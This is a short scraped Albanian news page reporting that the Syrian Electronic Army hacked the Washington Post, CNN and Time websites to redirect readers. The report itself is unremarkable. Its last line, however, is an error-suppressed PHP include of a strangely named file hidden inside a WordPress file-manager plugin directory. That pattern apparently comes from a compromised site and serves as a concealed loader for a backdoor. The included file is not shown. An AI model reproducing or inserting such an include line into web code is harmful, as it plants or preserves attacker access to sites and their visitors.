Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Tre grupe mediatike nën sulm kibernetik

Tre grupe mediatike nën sulm kibernetik

Faqet elektronike të tre grupeve të rëndësishme mediatike amerikane u bënë pre e sulmeve kibernetike nga përkrahës të Presidentit sirian Bashar al-Assad.

washington post

Gazeta The Washington Post, rrjeti CNN dhe revistaTime njoftuan dje se hakerë kishin ndërhyrë në faqet e tyre elektronike duke modifikuar disa parametra të faqeve. Si rezultat, kur përdoruesit vizitonin faqen dhe klikonin në disa prej artikujve, hapej faqja elektronike e Ushtrisë Elektronike Siriane, një grup që mbështet regjimin sirian.  Grupet mediatike thanë se kanë ndërmarrë masa mbrojtëse dhe kanë hequr modulën e ndikuar nga sulmi.

Ushtria Elektronike Siriane mori përgjegjësinë për sulmet përmes një mesazhi në Twitter.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";